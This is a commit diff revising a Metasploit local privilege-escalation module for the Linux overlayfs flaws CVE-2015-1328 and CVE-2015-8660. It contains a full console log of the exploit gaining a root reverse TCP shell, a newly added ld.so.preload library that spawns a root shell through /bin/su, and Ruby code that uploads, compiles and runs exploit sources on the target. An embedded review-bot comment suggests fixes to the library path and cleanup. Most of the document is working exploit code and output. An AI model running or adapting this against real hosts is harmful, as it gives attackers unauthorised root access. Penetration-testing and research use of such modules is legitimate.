revamped
parent
12493d5c06
commit
0d1fe20ae5
data/exploits/CVE-2015-1328/ofs-lib.so
@ -129,18 +129,18 @@ Untested against
|
||||
|
||||
#### Escalate
|
||||
|
||||
resource (/root/Text-1.txt)> use exploit/linux/local/overlayfs_priv_esc
|
||||
resource (/root/Text-1.txt)> set verbose true
|
||||
resource (overlay.rc)> use exploit/linux/local/overlayfs_priv_esc
|
||||
resource (overlay.rc)> set verbose true
|
||||
verbose => true
|
||||
resource (/root/Text-1.txt)> set payload linux/x86/shell/reverse_tcp
|
||||
resource (overlay.rc)> set payload linux/x86/shell/reverse_tcp
|
||||
payload => linux/x86/shell/reverse_tcp
|
||||
resource (/root/Text-1.txt)> set session 1
|
||||
session => 1
|
||||
resource (/root/Text-1.txt)> set target 0
|
||||
resource (overlay.rc)> set target 0
|
||||
target => 0
|
||||
resource (/root/Text-1.txt)> set lhost 192.168.2.117
|
||||
resource (overlay.rc)> set session 1
|
||||
session => 1
|
||||
resource (overlay.rc)> set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
resource (/root/Text-1.txt)> exploit
|
||||
resource (overlay.rc)> exploit
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if mount points exist
|
||||
[+] /tmp/ns_sploit not created
|
||||
@ -150,31 +150,32 @@ Untested against
|
||||
[*] Checking if mount points exist
|
||||
[+] /tmp/ns_sploit not created
|
||||
[+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
|
||||
[*] Writing to /tmp/k4JlQwrx.c (4375 bytes)
|
||||
[*] Writing to /tmp/JmK51Dpa.c (3714 bytes)
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 4375 bytes in 1 chunks of 15306 bytes (octal-encoded), using printf
|
||||
[*] Compiling /tmp/k4JlQwrx.c
|
||||
[*] Writing to /tmp/cjKriIIN (155 bytes)
|
||||
[*] Writing 3714 bytes in 1 chunks of 13319 bytes (octal-encoded), using printf
|
||||
[*] Writing to /tmp/ofs-lib.c (439 bytes)
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 439 bytes in 1 chunks of 1563 bytes (octal-encoded), using printf
|
||||
[*] Compiling /tmp/JmK51Dpa.c
|
||||
[*] Writing to /tmp/R6TrMF7f (155 bytes)
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Exploiting...
|
||||
[*] Sending stage (36 bytes) to 192.168.2.156
|
||||
[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:57869) at 2016-10-04 22:55:04 -0400
|
||||
[+] Deleted /tmp/k4JlQwrx.c
|
||||
[+] Deleted /tmp/cjKriIIN
|
||||
[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:35876) at 2016-10-14 11:26:49 -0400
|
||||
[!] Tried to delete /tmp/ofs-lib.c, unknown result
|
||||
[+] Deleted /tmp/JmK51Dpa
|
||||
|
||||
3437009797
|
||||
lGTsPkjgaOAhZPAssSiPBdigTNuavPNA
|
||||
2356964145
|
||||
psMfOJcKGKnafhAvALIeSFNegauafmux
|
||||
RHxxKeTrEKLTMmssPTZjlJvkpblZjWSH
|
||||
KWETRaFhNLLRkUbhRkRoflvdRdbJBPFP
|
||||
true
|
||||
zQgQeZUDzBZvCUelOYXjpIviozSnTjoE
|
||||
ZaGCLiKvvhyTawBwPHNqidQSerdmxDYE
|
||||
WjOaBQVXdxHBiVdomUBMRRrnLOPUGfGD
|
||||
true
|
||||
DgSZZHBIFrsBMvyRTBNSBTcRmVMZXMyx
|
||||
bwHnnuHwZAvSsZoYLhNrcuRDIKuqPRWu
|
||||
NfNIsINldyrgOLLagCPIQiQsZqTsmUec
|
||||
ORoIgajQlzSvaciHEGqEvQZqLZMpJDjQ
|
||||
dTdIcyWRpQOpEHizUhOQkDVqQZaxQIFR
|
||||
UCINXsLPGwYDBqnRKbFyLFOzkbifFPiF
|
||||
sh: 0: can't access tty; job control turned off
|
||||
# whoami
|
||||
# # # whoami
|
||||
root
|
||||
# uname -a
|
||||
Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
@ -95,6 +95,7 @@ main(int argc, char **argv)
|
||||
}
|
||||
|
||||
fprintf(stderr,"/etc/ld.so.preload created\n");
|
||||
/*
|
||||
fprintf(stderr,"creating shared library\n");
|
||||
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
|
||||
write(lib,LIB,strlen(LIB));
|
||||
@ -103,7 +104,7 @@ main(int argc, char **argv)
|
||||
if(lib != 0) {
|
||||
fprintf(stderr,"couldn't create dynamic library\n");
|
||||
exit(-1);
|
||||
}
|
||||
}*/
|
||||
write(fd,"/tmp/ofs-lib.so\n",16);
|
||||
close(fd);
|
||||
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
|
||||
|
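--- a/external/source/exploits/CVE-2015-1328/ofs-lib.c
+++ b/external/source/exploits/CVE-2015-1328/ofs-lib.c
@@ -0,0 +1,16 @@
+#include <unistd.h>
+
+uid_t(*_real_getuid) (void);
+char path[128];
+
+uid_t getuid(void){
+_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, "getuid");
+readlink("/proc/self/exe", (char *) &path, 128);
+if(geteuid() == 0 && !strcmp(path, "/bin/su")) {
+unlink("/etc/ld.so.preload");unlink("/tmp/ofs-lib.so");
+setresuid(0, 0, 0);
+setresgid(0, 0, 0);
+execle("/bin/sh", "sh", "-i", NULL, NULL);
+}
+return _real_getuid();
+}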
@ -161,17 +161,6 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
|
||||
end
|
||||
|
||||
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-1328', '1328.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_1328 = fd.read(fd.stat.size)
|
||||
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-8660', '8660.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_8660 = fd.read(fd.stat.size)
|
||||
|
||||
filename = rand_text_alphanumeric(8)
|
||||
executable_path = "#{datastore['WritableDir']}/#(unknown)"
|
||||
payloadname = rand_text_alphanumeric(8)
|
||||
@ -200,33 +189,70 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
|
||||
end
|
||||
|
||||
def upload_and_chmod(fname,fcontent)
|
||||
def upload_and_chmod(fname, fcontent, cleanup=true)
|
||||
print_status "Writing to #{fname} (#{fcontent.size} bytes)"
|
||||
rm_f fname
|
||||
write_file(fname, fcontent)
|
||||
cmd_exec("chmod +x #{fname}")
|
||||
#register_file_for_cleanup(fname)
|
||||
if cleanup
|
||||
register_file_for_cleanup(fname)
|
||||
end
|
||||
end
|
||||
|
||||
def on_new_session(session)
|
||||
super
|
||||
if target.name == 'CVE-2015-1328'
|
||||
session.shell_command("/bin/su") #this doesnt work on meterpreter?????
|
||||
# we cleanup here instead of earlier since we needed the /bin/su in our new session
|
||||
session.shell_command('rm -f /etc/ld.so.preload')
|
||||
session.shell_command('rm -f /tmp/ofs-lib.so')
|
||||
end
|
||||
end
|
||||
|
||||
if compile
|
||||
begin
|
||||
if target.name == 'CVE-2015-1328'
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
# Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary.
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_1328 = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
# pulled out from 1328.c's LIB define
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
ofs_lib = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
else
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_8660 = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
end
|
||||
rescue
|
||||
compile = false #hdm said external folder is optional and all module should run even if external is deleted. If we fail to load, default to binaries
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if compile
|
||||
if target.name == 'CVE-2015-1328'
|
||||
cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/,
|
||||
"execl(\"#{payload_path}\",\"#{payloadname}\",NULL);")
|
||||
upload_and_chmod("#{executable_path}.c", cve_2015_1328)
|
||||
ofs_path = "#{datastore['WritableDir']}/ofs-lib"
|
||||
upload_and_chmod("#{ofs_path}.c", ofs_lib)
|
||||
cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file
|
||||
register_file_for_cleanup("#{ofs_path}.c")
|
||||
else
|
||||
cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/,
|
||||
"os.execl('#{payload_path}','#{payloadname}')")
|
||||
upload_and_chmod("#{executable_path}.c", cve_2015_8660)
|
||||
end
|
||||
vprint_status("Compiling #{executable_path}.c")
|
||||
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
|
||||
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile
|
||||
register_file_for_cleanup(executable_path)
|
||||
else
|
||||
if target.name == 'CVE-2015-1328'
|
||||
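Review bot: The preload library path disagrees between this hunk and the C source it drops: the module builds the library at `ofs_path = "#{datastore['WritableDir']}/ofs-lib"`, but 1328.c in this same commit writes the literal `/tmp/ofs-lib.so` (with a hard-coded length of 16) into /etc/ld.so.preload and on_new_session removes the literal `/tmp/ofs-lib.so`, so any WritableDir other than /tmp leaves the loader pointing at a missing file and the real .so uncleaned. The `gcc -fPIC -shared` result is also never checked, so on a target with a broken or absent compiler the exploit still runs and leaves an /etc/ld.so.preload entry referencing a nonexistent file, which is seen by every dynamically linked process on the host and is only cleaned up if a session actually comes back. The least invasive fix is to pin the path to what the C source and the cleanup already assume, `ofs_path = '/tmp/ofs-lib' # must match the literal path 1328.c writes into /etc/ld.so.preload`, and to guard the build with `fail_with(Failure::Unknown, "failed to build #{ofs_path}.so") unless file_exist?("#{ofs_path}.so")` before `#{executable_path}.c` is compiled. If the write in 1328.c overwrites a pre-existing /etc/ld.so.preload, the `rm -f` in on_new_session would not restore it either; that part of the C source is not visible here and is worth confirming. The enclosing exploit method begins before this hunk and its binary-drop branch continues in the next one.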
@ -235,9 +261,18 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
cve_2015_1328 = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
upload_and_chmod(executable_path, cve_2015_1328)
|
||||
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so')
|
||||
fd = ::File.open( path, "rb")
|
||||
ofs_lib = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
ofs_path = "#{datastore['WritableDir']}/ofs-lib"
|
||||
# dont auto cleanup or else it happens too quickly and we never escalate ourprivs
|
||||
upload_and_chmod("#{ofs_path}.so", ofs_lib, false)
|
||||
|
||||
# overwrite with the hardcoded variable names in the compiled versions
|
||||
payload_filename = 'cjKriIIN'
|
||||
payload_path = '/tmp/cjKriIIN'
|
||||
payload_filename = 'lXqzVpYN'
|
||||
payload_path = '/tmp/lXqzVpYN'
|
||||
else
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660')
|
||||
fd = ::File.open( path, "rb")
|
||||
|